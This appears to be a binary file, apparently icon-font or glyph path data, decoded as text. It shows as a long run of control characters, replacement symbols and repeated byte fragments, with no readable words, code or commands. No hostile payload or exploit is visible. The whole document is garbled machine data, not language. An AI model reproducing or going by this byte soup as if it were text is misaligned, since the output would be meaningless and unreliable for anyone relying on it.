�H00		0		y����!)A2"&4>/7>.'&7264&"7'76.'&?>�Α�Α�
c4&&4&���Α��>
�&4&&4����@H%/67#"'".5'7&'&6?67&5462'0"0"132676&"264�767,RL\142G6G!	D8P84#03C#"9d
�h`:_~)= {:|"

v(88(Y$
Xt7/

���C�-D54&"54&"&'54&"&=4632762654.'&'&6?*#"�7?@:FF:@�w('�
��c�9%�
Wc��G6�-#`

zo

oz

`#-�5K`�/!a5/B/��@� *62"&=46/627.#"75&"26>54&'���8DF;<<"} @ &4&/&:!D8�K5�5KK5�5S,
&&

�

&&m&
,���!33#"&476&67>	-jQ�e:K? 9�2D[OV,�}n5119�."3W8.����)T];#!"&546;;2=4+";2=4+""'.'&"+";26?212?62;264&##532�
�
��

ȠPPPP�	+"		
/		I�
8
��

�
HH�	)6		2
			
�����'0;#!"&546;6&+54&+"#"27#532�
�
��

�LA	 	A`��
8
��

�
��P		P`R
���G�3#532&=#53546;#!"&546;;#"��
b�`@@��	�
��

�
��	F�b�`A@A|	�

�
�
�	���	373#"&=46%#532;#!"&=3?6/&#46;pp		��
7
�
��
�``�
Ƞ@	 	�
��
��

�A``A
����*6BR%#5%#532;#!"&546;;2=4+";2=4+"54+";254&+";265 ��
7
�
��

ȠPPPPPP	�		�	�@@�
��
��

�
HH���		`		����&2m#532;#!"&546;;2=4+";2=4+">54./&546;2?6'&'54+"+"'&;25y�
7
�
��

ȠPPPP�	-	-	W
��
��

�
HX��





����;CL;#!"&546;&'654&+";26=3??6/76/#5327#532�
�
��

�E!!%P			;�00		ɀ
b8
��

�
��!&%	�		0;7 		��b��A�7@EO7;#!"&546;;&'.'&"+";26??62#5327#%'762��
��

�
��	+"		��
b`�D�ED
(

�
�
/R	)6		2

(�b�D��D����'0;#!"&546;26/&";;26=7#532�
�
��

�A``A	 	��
8
��

�
��``P		P�
����&%"/&4?'&?67627'"/�		�Pu_VVR		[1�;;		;Q�		�uP_VVR		��0�;;		;R
��@�
"1%"&546?"/&4?'&?67627'"/@%6% 		�Pu_VVR		[1�;;		;Q�]#%%@		�uP_VVR		��0�;;		;R
�����
-A\n�62#"&76'47'.76'4&'".76'&6&'.76'&767'.76'.'".676#"&54'&676'&'.#&#0#"&=&762�+>		";I		
(�Lm

Q9		



'"&(X<9

GKl>60�
rn	ik
`<*MK	
GH  ML	
FI)<
#.><	
79?1:kJ55
897O
z,
	'
V		<9R
fHJ*�� @`$2#"&'&?'&6>264&#"G0a@((@a0>p&X	
W&p�		`)7337)<*B
nn
B*<�	
����'/$2"&4&2"&462"&4264&"24+"36264&"N�Α�ΑP*<**<���<**<*�ΑΑ��)<**<*�  h*<**<����'2"&4264&"6'.#"7626264&"�Α�Α��	
=("
	14)��Α��*�	"
	������32+"546;5'&63!2!!��8�8��J��0����**0����j2"&446;.'+";2;2/&+";232?676?6?6=4&+"/&6?63232?65�Α�Α�	Y;		Z
	/
 	
	
	��Α��G	:R				 	
	
����_n2"&4654/&+.#"/&54?632;26/&54?6;2?6/&?6//2?676767654'�Α�ΑJ		
C	
	
G 	
	
_
��Α���
			


		G&
	
			 
	
/d/*����8m2"&4762;2=4/&4?&#"32?6;26=4/&?63254/&=4+"+"/&+";237632;2?6�Α�Α�	3Su>
		�'

	��Α��_N
	&
uS-			f



	
����!%)-15=DK2"&45#375#"6264&"5#75#5#75#5#75#6264&"5#326=4&+�Α�Α�(

 5000p000p000`(

��Α��(
8(
��((8((8((8((8((8((h�(%
(����&2"&4"264&"2642676&"'&�Α�ΑU�`Y
	/�/
��Α���6'	
'����#22"&4%2767&'&"2767&'&"2676&"'&�Α�Α8�+`Y
	/�/
��Α��!"		!"		!"		!"	��6'	
'����+92"&4$"?626'&'"?626'.2676&"'&�Α�Α[&#
&
	
�#
&
	
`Y
	/�/	
��Α��)))��6'		'����-AP"&5476227"&4632&"?626'&'"?626'.2676&"'&�(**0	�Α�gJ>/L&#
&
	
�#
&
	
`Y
	/�/
@77<03g��Α)!.)))��6'	
'����':2"&4?6&'&'&2676&"'&%>'.'.7�Α�ΑZFi`Y
	/�/	
	��Α��F

��6'		'�	
F����#12"&46/764.?64/&2676&"'&�Α�ΑP!!�!!PPX`Y
	/�/	
��Α��-0((	((00��6'		'�����/<JZ"&767622"&47667'676&&>'?6&/.?6.>'&26�*��)!)y�G!)y�G�	Z

4]Z

4�"k,<@PH)��H)
G�y) G�y) ([
4
�

Z`"a$,k���� .G2"&4?6/76&/&"2676&"'&%6&/&"?6/�Α�Α_#
F`Y
	/�/	
'#
#��Α��	##	  ��6'		'�	  	##������6FVd72"&476"'&'&61"&'?676&>32&'&&"?626'."?626'&2676&"'&f)S)
Hr s�s 
�_?lE
K&#
&
	
�&#
&
	
`Y
	/�/	
�H))GR9DD9R]:e=b)))�6'		'����%-K26=676&"'&.54264&"264&":#".=6362?>�ΑYH	*
	/�/	
*	HY��&

��gO~.$		$.~OgW�@%
?	����;HU%:#".=6362?>26=676&"'&.5464/&?'76&6%&

�ΑYH	*
	/�/	
*	HY�P!!�!!
	PPI@%
?	l�gO~.$		$.~OgA0((((00����%8@^2"&4&26=676&"'&.546'.#"?62264&":#".=6362?>N�ΑYH	*
	/�/	
*	HY�
%
&�4&&4&
&

��gO~.$		$.~OgP						0&4&&4�@%
?	����"1<62"4&"276'.#"?62&2676."�Α��7�
%
&�	
Y`Y
/�YΑ�Α						a	'66'
 �`/?O_72+"&=46;2+"&=46;2+"&=463%2+"&=46;2+"&=46;2+"&=463`

@

�

@

�

@

�

@

�

@

�

@

�
@

@

@

@

@

@
�
@

@

@

@

@

@
��@�/?O_2+"&=4632+"&=4632+"&=4632+"&=4632+"&=4632+"&=463`

@

@

@

@

@



@

@

@

@

@

�
@

@
�
@

@
�
@

@
@
@

@
�
@

@
�
@

@
���"@72+".=4>;2+"&=4632+"&=4&#"+"&=6�

�%

�Ҕ		zV8`8		�
�
@&@
�
�ip		pVz8`8p		pi���F7+"&=46;2#"&=46;22+"&46;23265454&"+"&=6�
%%
�

%%�Ҕ5%� fz�z		�p
%0%�
p
%0%`�i�%5(�VzzV		i��!�77/'7'&54%'76DC#)�#+3`3
����+ FC##�*
3`3+�+ǩ����';GS_ks&'&'&6;2+"'&'&'&6;2+"2#!"&=46;254+";2754+";2754+";2754+";2"&462�+
+
n+
+
�
%��%%+o�```��6%%6%($>($>($>($>@
�%%�%
S�pppppppp@%6%%6��@�-=M]ms��#32+54&+"#"&=46;#"&=463!2;26=4&+";26=4&+"';26=4&+"26=4&+"334&"%54&+";26=4&+";260		�	 	�				 		��&&&&�&&3&3�8P8&&&&���	 	P		P	 	�	 		 	-&&e&&[&&�&&�(88e&&e&&����7DQ&=4;2+"=46#"'6+"=4.'&=4;22#"./2!2+"&/�<0(0��$qY��Z�).00�vYuV


v*AB>,9!,��P8!W1/'
%>>��
�
�
p

	�����-52"&4264&"4'654.'&7>264&"�Α�Α��##")��Α��W�

			�����5G2"&465."?624'654.'&7>765.#"?62�Α�Α�#&#	
&
h##")A#	
&
��Α��K))�

			�!)����&.Ma%/&>7676#"&462&#.&264&"4'654.'&7>?626'.#"�S
�/4g��ΑT��##
)
'	

.!	S	T�Α�g.,%#�

			�						
	����%2"&4"264&"2642676&#!"3�Α�ΑU�87Q
��
Q7��Α���H66H����.<2"&4?626'.#"?626'.#"6&#!";26�Α�Α

&
	
#�

&
	

��
Q77Q��Α��6)!!w6HH����#12"&46/764.?64/&6&#!";26�Α�ΑP!!�!!PP
��
Q77Q��Α��0((	((00�6HH����!/2"&4?626'.#"&"2646&#!";26�Α�Α
&	
%Z�
��
Q77Q��Α��5						
6HH����	ALP7"&=46;%+5322+"&547#"&547#"&5#"&=46;2#46;25#�

 @
  
0		S(�(S	0		`	`�`0`�
�
� 
�
�	 		p	 		�� �000��@�#/2"'&547.=462767'5%6�hJrr�w��,!�!/	
��J4>��>4�0�?�	�(%�@�%(��
8 ��@�!+72"'&54264&"7.=462767'5%6�hJrrm""�w��,!�!/	
��J4>��>4^""I0�?�	�(%�@�%(��
8 ����� ?&7>'7'/&?6276^K�K"r/7�5��bWi!%�K�K"7/rD5K��bWh$�����	4'&6;2%2&'7632"&46&/&"?6/�?/o	
o
U
	o/?E
ʒgg�g
44&	//	=
+��+
s�g�gg�6
//
%4		4����2"&4264&"264&"�Α�Α����Α��W����!32"&42654'"&54724+"362654'"&547�Α�ΑX&4&""���4&""��Α��G&&&

�  p&&

&����*!2#!"&=463!6?654&+";26p		��		�MM0FF	 		 	[��;LL�&&���	+#76322++"&767.5#"&=463�d��				C6
�
6C		�c�$�	 	<a  a<	 	���0#!"&=463!22+2+"&=463546;265�
��

`
 %8(�

@

%�
@

`

 %@(8 
�

�
 %
	����	-9AF673&.'3'>76732#!"&5463264&+"36264&"7#&�-''-V.
'j

��%%		�		;jKKjK�-'1) )**h*#f)1
�@
%�%�`				`KjKKj�1)���?'73264&"'766'OTc!�]
];1#]$�b�!cT;]
]�'T(�b���&7'73264&"'>%'762���+
���
(�]
o9�9(5+��]�(
�		B(9�9�����$67'&4?622?'762'&?%"/7?md		Z		">>,�.q.(-�q��k�		Z		d�,>>�d		Z		">>,.q.-(q��k		Z		e�,>>����.!2#!"&=4637&=46'46'%&'p		��		

'f0
A	db+
(&+��	 		 	�
e		C�	�1N
������1!2#!"&=4637'&6?627'&6?63276+"p		��		AM(Hh�A�c++.,���	 		 	kS$4b!R21'$�����*2%//&?'#+"&546;276%3264&#-NNNN�	 		�(80$TN��`

`NNNN�P			8($6TN�@����.6J254&""'54&".546'.#"?62264&"76'.#"?62�ΑA7		.d.		7A�

%
&9((�
%
&	��gBq!�		��		�!qBgG						�&4&&4�							����#.2"&4"2642654'&"6264&">'&#"32�Α�ΑU�(**3�-F7��Α���77��6 ����!)-59%+"&5#"&5#"&5463!235#264&"75#264&"'3'#u
 8P8�8P8 

��R``L((�`�((0�PB�
o
(88((88(
 
�`��((�``�((�`����=2##"'&7#"&?6&&/&?6>76327>o
)"(
C#+M�

b:

7:&
*KJ6
E=	 8=�	�'
	%#3hG6!'����'92"&4?626'.#"6&"'&276'.#"?62�Α�Αp

&
	
#�

#n#

-�3
#	
&
��Α��F)�**6�!)����(,048<@!2+"&=4>;53#!"&54>3!23'7#?#3'#73'3'#�		�	0��7		��7	���
�
�j�
`����
gFrj	 
	   ���		
B1``�pp�``�p�``�p����A�,2"'.543267>&'&'6768'S�S''?D++D?'��!FG"%;?QQ?;%$'88'$oo==o����"%/&&?6/&6?6�%">H6 F&3
&)'H!.L	�C>"(	4949/!=	���	!)19AIQ#546;22"&42#!"&=463264&""&4622"&4&2"&462"&42"&4�
@
��(8
�
8(B//B/��Mss�``
m
8(�

�(8�/B//B3s����*5!2#!"&=46;26=4'&5463 �@(8
�@
8(C	D-+@@@8( 

 (8(2,:+ *$
�����'#"/#"&?'&6?627//�
j��j
�A	(	ARr3f&g�DD�g&���Qg��6r����#/;I2++"&=#+"&=#"&=46354+";2=4+";2'#546;2#5P	 	�	 	�����0`0 �				��h�PPPP����2"&4264&"264&"6264&"�Α�Α�C4&&4&���Α��*�&4&&4�����(048%2#!>?465762'"&546;2264&"75#75#�

���?		�K		�9O8
�	j8@@@�
�
��		�K

-��(88(�
	�_�@@�@@ �hT\7&'76?6/&"'&+""2+"'"'"'+"&=46;276;2276;2276;23$"&462�	DP(1d"dq
0

0�		:&&t&&t&&:		%JJ%�1B//B/�b9
"&
P			 	 	      	 	`/B//B����4j%2+"'"'"'+"&=46;276;2276;2276;23%"'&'5462+"&=4&"35462+"&=4&"#5#p		:&&t&&t&&:		%JJ%��
8P8	 	�8P8	 	
� 	 	      	 	 	
�(88(		

``(88(		

�
	`������ '&?66762%47#"&z	
��	
�(-6,!��2BIg


	�

	�>@4_6I&(&�-h����#22"&46/764.?64/&"7626'&�Α�ΑP!!�!!PP�RM	)�)��Α��-0((	((00�>-
-������3#"./.""&/&'&'&7>76676/676�%

	""
%2" #d
	

0)"2`>1(CS9"

�

�


"9SC(2="3	@#3����	1.7>>327/6'&2#!"&=46;7s-�G'I!`+
.#:?f		��		�I<A78;Z=L_�[�,�H	%]J��	 		 	�����/37;?W#2+"&5#+"&=4635"&=46;2346;235!355#!5#=#"&=#+3235463


`
�
`



`
�
`
` ��  �  
�
  
�
@
�
`



`
�
`



     ��    `�
  
�
  
�����$%#!"&7>;&5463232&264&"��`I<8(,<	�))$(8,����%�"2+"546;5.?4>;23'��(4@�	@4r�uW7��7Wu�PP������/7;%+32#!"&=46;5#"&?#"&?&5462+&"264#3{	�p		��		p�	^1
r(r
1V			`��
 	`		`	 
a	~~	�			�y ������"5#"'&"#"'&'&767676676'#'&7676763_'$+A
 
A+$'*$$*?#/++G0:

:0G++/#

%
$
	����(/6BJV^%'"''&7&766267&'&'767*#">"6727&'76'&'66''6'&#"#"#2"&4�7W$|$W77W$|$W�k%,� 2 `!!!!�%��K54
VV
45KK54
VV
45�	
#�
#
�%��%x####(
#
	�#
	 �`O%#"&'4.#!"#"&=46764'.=46323!2>5>32W,'
��',,
	',�
$,

,$

$,

,$���+"&462'&'.=46%2.=476`8P88P>
F|�<|E
D�P88P8��#��"�)��@�2h2767#"&'#"&547.547&5467&5463021>#"'#"&=6=4'.=46320212�%*&*(%*&*%		%(�%J�**	(.(	%
��(	**�
J%%	(��+5HY%+"&=!+"&=&=46?>;2%!'.+":>54&#"!264&#":�
 
�
 
 �"9���9
"N	
�!06

  

60!2
& 222
�!	�#/K2#!"&546;546;23546;254+";2%54+54+"#";;2=32�

�@

 	`	�	`	�pp((((@
�


0		00		0�((((������*fz��7&?6/.?6/&6?>?6/.?'/&'&?&'&?676?676767676%&>76&'&'&/&#"&>76�#
NA	2M
+= %�




	�
	
 {
�}
	
	{	 �l)

�.M
+=
NA	28+$�/4
C

4.+!	5d
	)6!+.O
����$,04<2+"&5#"&5#"&=46?>;2264&"75#;'#264&" (8	08P8�8P80	0!�
m�|((xM&��MY�((8(P	(88((88(	p"z
��((�```��((��@�Qh!2#!"&=46332'.=4&+!46;2327>=.=46;5462354626&+76&+";327P		��			2"'��%�%$4

			 		��:D;	 		 	@	 *x!..p`%%�4$
v* 	0		00		`3	kS���'%"/&4?626/&#";2=37�		�

�		�

{U
p
 `
�

�		�

�		�N6
P@6����'8@HPX`%2#"'##"&5475&546323632#0#23'"1"&46;7#264&"64&"2$"264264&"264&"�%%%�%%  %%�%%%''���&%%&��			w			��			 			@			`%6%  %%�%%  %6%A A	@%6%@b			�			 			��			 			����7AE%'&?67&?'&?6'2#!"&=46;;267!463!2!�::$$U$$::	&�&	�
=��@���;;$$$$;;�	&&	p��P��������0&4?62'%/&4?2?/&4?2?������;��:��:��,jjjjjII�jjII���!;G7"&=463546;22++"&=2#!"&5463!264&#52%"=4;2#�

	@	

	(	$	� 	5KK5Oq1����
�
		
�
		�		KjK@qOI7  �`26A6#!"&='.=4>3235#"&=46;2+325'46?"&v�	
��
F		�88		�		892��0�
+$ �

/_	0				0A?>]
+>���0%#!"&5467&546;&546;2654'6323232�#*��*#*%!/
(8%*O(**(#*%/!8(%*#���#%+"&=46;2$2"&4%#"&?62
�

�
�KjKKjK߾	_
&
_	��

�
3KjKKjk �� ������7%/+"&=&/&6?'.?>546;276� 
�	@	�
 �� 
�	@�
 �r
8O�		�O8
NN
8O�	�O8
N	����+9GUcq2#!"&546354&+"26=4&";2654&+"26=4&";2654&+"26=4&";2654&+"26=4&";26 (88(�@(88(@	@	((	@	�	P	!.!!.!	P	�	P	!.!!.!	P	�	@	((	@	�8(��(88(@(8��@		@�@@		q8		8!!�X!!X		q8		8!!�X!!X		y@		@�@@		
����+9GWes��2#!"&=46354&";26754&";26754&";26754&";262#!"&=46354&+"26754&+"26754&+"26754&+"26 (8%�%8(@(	@	�!.!	P	�!.!	P	�(	@	%8(�@(8%`	@	(�	P	!.!�	P	!.!�	@	(�8(@%%@(8�  		8!!8		8!!8		  		�% (88( %P 		 		!!		!! 		 ������(6HT\j7&>#"./&67632*#"0&'&567%.?>766676.67&'7676.'&6� ]F&
#YJ gu$$ dY�,
� SaAO6 ��,
 SF
.�"�,�+-2# $D&�'
91+
	
�)H!A`)��	�,'*(O	����.6>F3"&'.535.535.53546;23264&"6264&"6264&"�@	F\F	%@$@$@
�
@�((((((
&%,99,	2 &
1&
1 

 %&�((d((d((����15����%2+.#"#."#"&=46;546;546;232%3'#2+/+"&=&'/&?&'#"&=46;67'&?667546;276264&"'2+/+"&=&'/&?&'#"&=46;67'&?667546;276264&"p		'0&CBCLC			�
q
SJ
���3Q0	
	 	
		
	 	
((�	
	 	
		
	 	
((�	 	"""	 	P	`

h
@`@�� 	
		
	 	
		
P((4	 
		
	 	
		
P((����7;CK%2+"&547#"&547#"&=46;546;546;232%3'264&"264&"p		2B\BDB\B2		
�
q
m0
���M�((<((�	 	.BB..BB.	 	@
�

�
@�``��((((�
3K?62"&472#!"&546326/.+";2?33754&+"&#"327;26����`�	6	6	F�		**
	�55��� ��
�	�
�		$*<*	��@�#/%2++"&=#"&=46;&5462&">54(

`
 
`

-%JlJ%E,�
 
�

�
 
;5AOOA5;�"9!(����:B%#!"&5463!2;;26=326=4&+54&+"#"5!"3�

��)77)F��	0	 	0		0	 	0	��
Z	4
	7)@)7v 	p		p	 	0		0	��@����/3B$2"&454+54+";2'"!546;546;232&'5#!"&=33�xTTxT�
&


<
@7.�uP�P	������	�TxTTxB
6

L
� P001`  �*&�0	����-9EQ]iu�����2#!"&546;546;23546;23546;254+";2=4+";2=4+";254+";2=4+";2=4+";254+";2=4+";2=4+";254+";2=4+";2h

��

(		@		@
�
��((((((�((((((�((((((�((((
��

h
P		PP		PH

��((l((l((�((l((l((T((l((l((��((l((���T2#"'#"547>7&54>'./&54;2?6&'&'54&+"+"'&;265�Ԗ�j83AL92	 		2	 		�z�z329JV�%						��B�Og#"'#"54767&5462;2=>54./&54>;2?6'&'54+"+"'&#"'#"&'32654'�zV<3+.&z�f-	-	Z.+3<@hc�9HB�^)3B^�	



�
6,qO

P23����#2++"&=#"&=46;546;2`

`
@
`

`
@
@
@
�

�
@
`

`
���W]ciou}���%2#'"/+"&57&'"/&4?&'"&=46367'&4?6267'46;2762'7&'67#677&'7&'6264&"67'367'?&'�

$
/;		;/
$

$
/;		;/
$�
+Y%+
l@	L1	C
+2:%+
l@	@1	�		;/
$

$
/;		;/
$

$
/;@	11	%
L%+
�@	1w�1	%
H%+
���-T7"&=46;2#546;2+"&2?#!"&=%5!'54767546;>3232�		�		�	�		�	F4��`�`��`NN�				P				r��՗�
F��F

,		,�!2#!"&546;54&+";26��`�@`	�		�	@� @�				�52#!"&546;54&+54&+"#";;26=326��`�@`	H		H		H		H	@� @�	H		H		H		H	������Z/&='&63!22"&4>54&/&546;2?6'&'54+""+"'&;25�?R;#P��y�^^�^�-		-	gCQ9	<��''�^�^^��

	

���eoy%2+5#5#5#33#54&+"#53535####"&=46;546;546;54623546235462354623232'354&+"54&+"�		P     P	@	P     P						@		@		@				�0		8	 	`	�	��``��P		P��``��	�	p	P	p								p	P	p�00		�@		@���1?G%"/&5476;5462;2=462;2=4623226?."62"&4�	f8�8f	@ 

 

 @��00200=�
	n<<n	
��

��

�Ѐ $ <�����2D%/#"/#"&57"#"&?'&6?'&676276'7'7''77'�
bK	
lDDl
Kb
n*^""^*/$/5--5/$4!!�5S
qYYq
S5h
<k

k<
h}(2332(6**6���� �g%3#"#.'3'&'473'676327&?'&4?'&64276/>76&'&67654'&6323�(!�QM(;/)V

:)-
**

**%5:

U)/`HXWE;
)f<G+%74#A	!		!	 ��	!	
	!A5% >+G=f)������%#!"&5463!20#"/267#"'&54?<14'"'&?&''3276/764/7454&#"#'4"'&32?.547&547"'5!"3�

��)77)F��%	=N=	% 

		
 ��
Z	4
	7)@)7v &11&  #	
po	! ��@��A� .=KY%&546?626"/.=54&?6754&3766=4/&'6=4/&*����
	� ,�

��PP�``�PP�``l1PP1
OmR�66�"-$���nv~/612#".5'"&5475#"&46307'/&'&6765'&?.5467'&?7>54'&54764'6'76/�82
5P/
))
	

/P8
/<		&!M,;;,L"&	U

�~s?'$=
*!
	

		!*
AE� 	

(/(F6$	33	55	33	$6F(/(	t &&""&&���'7#!"&=4?62335335332!546;2#!"&=463�
	� 	
��@`@`@	�@	�		� 		d%		%Z������	00	`	 		 	��@�'9=L:767#!"&=72"#".'.'5463%2+5.+54635#%#5463!2#"�*+ @
�
@ �
,)"	),


�$`
 @��`
@
�& 0�

�0�
!	"
`
�
�! 
�@@` �

`&����	'2=HS^it�2#546;2#546;2#546;2#54636"&546?"&546?"&546?"&546?"&546?"&546?"&546?546;2+32#!"&=46;5#"&=46;2;546;2326�	@	�	@	�	@	�	@	} s s s s s s 	 	8(��		�`		��(8	 	
�	 	�
@	��		��		��		��	 
 .

 .

 .

 .

 .

 .

 .
Ӑ		�(8@	 		 	@8(�		�
�		�����	CP3+"&%!&5476?2+54&"#54&/#54&"#"&=463#5467�
@
C��XE++EX

 @@ 

��  @��
�C8+5

5+8C<
�
@

@H$
&H@

@
�
@!  0
�����h�'&4?6"2#".5'546326=4&"+#".5463264&+&/&6;264&#"/&47632?6#".'&66iR;;%'
#/
)K5*A$!1 &&!			 

(8%	/
q%
&'5��;)d$4
&+	d
!5K01&4& (&
$'$
�	
$	

���������$&#".'&'32#".'"'#"&463267&'#"'&&'&4>7>6767&'#".'&#"&463232>7'.5462627&5462327>32#"#"'7>"264$"264g
!	 

(

(

 	!



*#%6%:%6%#*


�			��			h	

#8-%%-8#
	

!4"%%%%%%%%"4!

'							����2"&44&'657677�Α�Α�WA��Y&s3&�+E(���Α��gCg�g)�rG"ir	"?3N,/)g����	/%+54>?#"&5%#54&"#54?54?6m	p�	mp	�`%6%`0	LL	Q	d	�L	/�	�	�`%%`�	s	KK	s����/?2#!"&546354&+";26754&+";26754&+";26���p	 		 	`	 		 	`	 		 	���`���		�		�		�		@		@		����/?%#!"&5463!2326=4&+"326=4&+"326=4&+"���`���		�		�		�		@		@		`p	 		 	`	 		 	`	 		 	����("&462'+"&46;'.?67676&6%%6%_#n�\- 1&(':!
X!@%6%%6�An1"#G!\!./
!H
����)R2#"&=46?54?03>26=4#"/.=46226=4/&67621/&�
	Zu
M		z�&/		M
u
�'?
/`
Q��M		P
�`/
?'�

P		M�
�Q����1NV%#!"&5463!2"3237232/76&#/&"'"327654#0"#"&463:1324#&5!"3�

��)77)F�;/DD/'88'u��
Z	4
	7)@)7xCC`C8N8��@���$_%"/&=#"&462322654.#"7+"=&'&?6;2654/.54>354;2'&+"�d8HVzz�z,
��xT'B'<T�	-	d
,z�zzVH8	T<'C&TxE



���$0;%"/&=#"&462322654.#"62"'&54264&"�d8HVzz�z,
��xT'B'<Tq>+CCJ
d
,z�zzVH8	T<'C&Tx�+$OO$5
�����%57#"&'&6?535#546;272#546353#"&'&67�( .
W��
��
�
 �s -
�^)!HA���  

  
���=W!H��G�;%//&?'&?67672+#"/#"&=46;2>3;........

�b X,

Q
:U�........�
0
���
0
jC
���92#"&4632#0&#"3267#"/#"&?'&6?62T	+.j��j.,
W||W�7
DD
7L""	�Ԗ
|�|�6L$$L6EE������ &),/25%+"/#"&?'&6;76232#'#3373'7#73'�5k8*8k55k8*8kB( 5p55p8.�((�.�(�Y$^^$YY$^^$!7XXX&8!!�!&8!����	'E762#547!#762'#54&#4?6'76&+'&"#";2?326F&�r�&�`-`�H''''�+���

�+�f
��`'&]z
f�((((����

(S_bek2#"&=47'3'77'#"&54'!2!';32?327654/764.+'&#1"#"2#!26='7#'73(P	�^"o��&P(8��'	88	88�	B.��(8^"  >  �P	@�4j��&%p8(��..	.

...	.

.��	.B8( 4�5555���7;?267+32++"&=!+"&=#"&=46;5#"&=3355#xP
 0		0	 	�	 	0		0 
P`�`�
`
@	 	�		��		�	 	@
`
`@@@@@������@DH%+"&=#+"&=#+"&='&'&?5'&4?5'&6?%35!5!y7	 	�	 	�	 	7Y7		w��w		7����@��/
0		00		00		0
1@2@VV@2@�@@�@���-6/#"&=46;//&?'&?676�Yf

fP-..--..y��Y
�
`.--..--����%2"&4264&"&264&#"3"&462"&4�Α�Α�P88(PppP(8S��Α���m8P8p�p8P�����@�4DL";#";#";!!&'.7>/762#!"&=463264&"����ri����p'
FF'--[%
��
%��@@@`@��
M�N	
?JJp% 

 %`����0LT\"&462#!"&5463!2";26=654??6/76/&'&5!"3"&462			�

��)77)F�B/ 	@	 �GGbbFFbb���
w			8			�	4
	7)@)7& 
		
 �++**�@8			���� #!2#!"&=46;'&?676%3p		��		�5	

))


	5��t�	 		 	JJ
		
88
		
J�������-7?G327+"&=32+"&54&"&4632>?"&=264&"264&"#!*	 	� 
	�&
(833�@8P8@			Y			&�		�`
	&
8(V'`@�(88(�@P							������7#546;2#54'#5##5#+"&=!+"&="&?63!2p0K5@5K0(000(N	 	�	 	
j@��5KK5��.������p		pp		p ��B�<%+"&54674&5463263276&'654&#"&'&54632W*/!�(8$8(,
&�5T%8(
qO#)m_.!/8(1
(8&'A$(8
Pp
F)F[����DQ%#!"&54674&454632632%&?'&4?'&676276&'&"74632.?$8(��(84%B."6&�R	L	
SS
	X))X	

	!\B1#)
;
'z
1(88(&6.B$
&
	X))X	
SS
	Y
!B\.#1$D/
������ '0:EKO7'"&?&=46&63''&4?6#76276/&>2".=7#'3'kl�MA�rQ�	=m__}LP��uj�ddd�8�.�BY1b	����z�b��WBߜŰ�����#'&4?66&='46/&5����  � ���� R
ww
e��&]

�mt�

]&���;2+'54632264&"3+"&=#+"&=.5462�	% �57			��	@	�	@	$`	 %$.�
0			Y6�		pp		�
1
������CI7&?>#"&?#!"&547>7.='&4?'&6;2+"/#77		u*x�[ #H0�

GU�Z-3<<>�
K	@�uW+*)EB<#/@
_6m
2

c	

	%����.&#"+"'&7'&54>32?547>32�3HV(	#2"(?).F�3I	X!
)#"	(VO?
��� 0@P`p�����7+".767>%+"/&67622+"&=4632+"&=463/.7676"'&'&?6#''&'&?>2+"&=4632+"&=463'62+"5'67+"5+"5�
a%*%@�		`		`		`		�		S*
�
S
*S		$
*I		`		`		`		�

@��

.+�
hh
��	@		@	�	@		@		3$�

3+.
�3	Z�	@		@	�	@		@	�����������-Ohq;#!"&546;54+";2=4+"&=46;22654/&54;2=4+"+"374+"276=4+"&57#532�
�
��

�`		,`$$y�
8
��

�
�� 	 	`x7''7�
�����DP`p#"546;2!5'&=;27;2732?>72=4+"&546;2'&+546;2"&=46;2#3"&=46;2#0	 	�$�%   
#	p&  	 	��		 		@		 		 �		�X'$@@%5N	(			%?p		�	�		�		�		�	����&.6/&/&"/&&546264&"264&"�Rt
+))+
l��qQ��	0..0	Pv�����G�'%/&?'/&='6276"&47%;Z$1Z/�/-	��1�4%��Z	1-//-$1�%4�����'/mx��������32#54#32#54;2#54;2#54#54;2!32#54!2+32#!"&=46;5#"&=46;2;546;2326=4636"&546?"&546?%".546?"&546?"&546?2"&546?"&546?"&546?"&546?� 8 � H ` �H 	8(��		�`		��(8	 	
�	 	�
	���(
C�2(
 xxxxxxxxxxxx	p(8@	 		 	@8(p		p
�		�
p	 

'

' 

'0

'

'

'

'

'

'���$,!2#!"&=4637#7>?#?/7?/�		� 		��o�8V�@@  @�    	 		 	@ �"	k�


�   @@ �   ������JR7#"'.7/.?>2+"&=#"/1"&='&54?>3235463&"&462Q#4@:!�			0
/W	 /#	\((�5e
�b"+	��		�	P/S

SV

k/	@((����>F2#+"&=#+"&="'+"&=4632546;2632>264&"E
	 	�	@	3z3	@	pPI7

#�			`\
 		 �		GG		�B^)1

	P			��A�KS&/0+"&='+"/&54?&5457+"&=4636;46;2264&"@
! 	@	�	B		4$+�K5x	G			sM

	&f-!�		�@idD)
8		8$4!5K	 			����G�43+'7'#"&=265%/&/&7%62546;2 �	�(h�<h%�	���
e	@	M��	7@�w@I	�H�

��

Z4		�����Z%#32+;2?6+".'&7#"&=46;7#"&=46;7654&+"&/&6?6;232pd"�		�	T	%O#	*		d"�		�	T	%O2*		� 	 				
.0	 	 	 				
.0	 	����!+2#"/&"#"&7676276'&"276'&"A�J2??&'&@OarJO^!		!^!		1^!		!^!		�mIWH
8&&8�P`,�)))))))������#!"&'&5476273{	�� 
"
f&@U	
	�L�&@����KOSW%+32+"&=46;5!32+"&=46;5#"&=463!5#"&=46;2+!2%35#5#!5#�	h8

�

8��8

�

8h		H

�

H	����@`�`�	(
�

�
((
�

�
(		(
�

�
(	x@��@@@@������>FN2+32+'32+";2+"&'&76=46;76;2"264267#7`
8(\7
	PK�@
	�		p

l0(pP8�
9			Mwf�
 (82n
	�P
			%*&.PpX
			W;7�2"&=4$"6265427&"�ړ�ԖP�pI�I��9�9:��R>b;SS;b>/!

**

!Z����B"&462+"&46;%2+"/#"'.?'.?'&.6?6$((�

 M

C

6
 >U
%
(
'%,G*`((��)N$	f
W2
.W
(5����
&2#"&=4&54'!2!!2#!265(P	-P(8�� P	B.��(8�P	@�&'p8(� 	.B8(������#7?G/&/&6?'.?>76'.5462+"&76"264&"264�
��
��
��
�� &TxT& ~
��
ZZ
EE
ZZ
E�:"5KK5":

�������&?6S��	
M	
=�

	�9

����G�o�'&54?>#/#+"&='"&547+"&=4?#/&?6;'&/&?637>23?632/&6?6#'&'��	

	0/=		J7R7J		=/0	

	4
NE
5	

	2=$
$
$=2	

	5
EN
s6NH(�		
Ha	N		Iw
(==(wI		N	aH
		O	P		
L44L
		P	�HN6	����@�$,4<DL!#!"&7>=46264&"264&"264&"264&"62"&4264&"�	��
	8			I			I			I			�P88P8S�:J)�1
	
�Pp�															�p�pp��%6%%6����muz$2"&4264&"2&#"#+"/+"&=&'"/&4?&'#"&=46;67'&4?6546;2354762264&"73'#�H44H4Nh
	3;$Q
	
	,	
	

	�	8f	
